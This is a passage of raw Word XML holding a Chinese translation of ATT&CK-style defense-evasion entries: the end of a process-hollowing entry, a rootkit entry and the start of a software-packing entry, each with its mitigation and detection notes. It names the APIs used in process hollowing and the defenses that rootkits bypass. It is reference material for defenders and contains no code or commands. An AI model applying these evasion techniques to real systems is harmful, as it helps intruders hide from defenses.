      </w:r>
    </w:p>
    <w:p w14:paraId="7E76B732" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用可能会生成大量数据而且可能无法直接用于防御</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除非是在特定情况下为已知的错误调用序列收集数据。因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用往往是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>善意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，很难与恶意行为区分开来。进程替换</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>过程中可能会调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>ZwUnmapViewOfSection</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>NtUnmapViewOfSection</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来取消</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>进程内存映射</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也会调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>WriteProcessMemory</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>修改其它</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的内存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5EECC8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析进程行为来确定流程是否正在执行其通常不执行的操作，例如打开网络连接，读取文件或其他可疑的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>入侵后</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE729E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Rootkit</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="71601DCF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06701FEC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F368E9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> T1014</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1685526A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F368E9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B77065" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F368E9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F5F9BE5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F368E9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t>, root</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11EC8BCB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F368E9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>BIOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>MBR</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，系统调用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ABB97EE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F368E9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：文件监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机侵入防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于签名监测</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统访问控制</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件名或文件路径白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>杀毒软件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49C04D3E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F6489AF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F02BF3D" w14:textId="64BE5B7C" w:rsidR="000F2665" w:rsidRPr="00D7258F" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Rootkit </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是通过拦截（即</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:t>Hook</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和修改提供系统信息的操作系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用来隐藏恶意软件存在的程序。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Rootkit </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rootkit </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能可能驻留在操作系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户或内核</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>甚至更低的层中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F368E9">
        <w:t>Hypervisor</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Master Boot Record</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00F368E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统固件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476F57A2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FD406A" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4F7CAC"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rootkit </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来隐藏程序、文件、网络连接、服务、驱动程序和其他系统组件的存在。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rootkit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mac OS X </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上被观察到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7258F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1581BED7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D83018B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于系统功能的滥用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DEF742" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C05693" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某些</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rootkit </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保护可能内置到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>杀毒软件</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或操作系统软件中。有专门的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rootkit </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测工具，用于查找特定类型的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rootkit </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为。监视是否存在无法识别的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、设备、服务和</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MBR </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA09E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的更改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC616B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7061ADF0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>软件加壳</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="772C5AE3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E5AB304" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1045</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="289290C6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19C8BA33" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="449BE7D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>二进制</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>文件元</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C199DCA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于签名的检测、防病毒、试探法检测</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DC705D4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId119" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-570</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07377FBE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BA79F83" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689F57E7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件加壳是一种压缩或加密可执行文件的方法。攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过对</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可执行文件来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加壳</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>更改文件签名</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>试图规避基于签名的检测。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大多数解压缩技术都是解压缩内存中的可执行代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FC27BD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
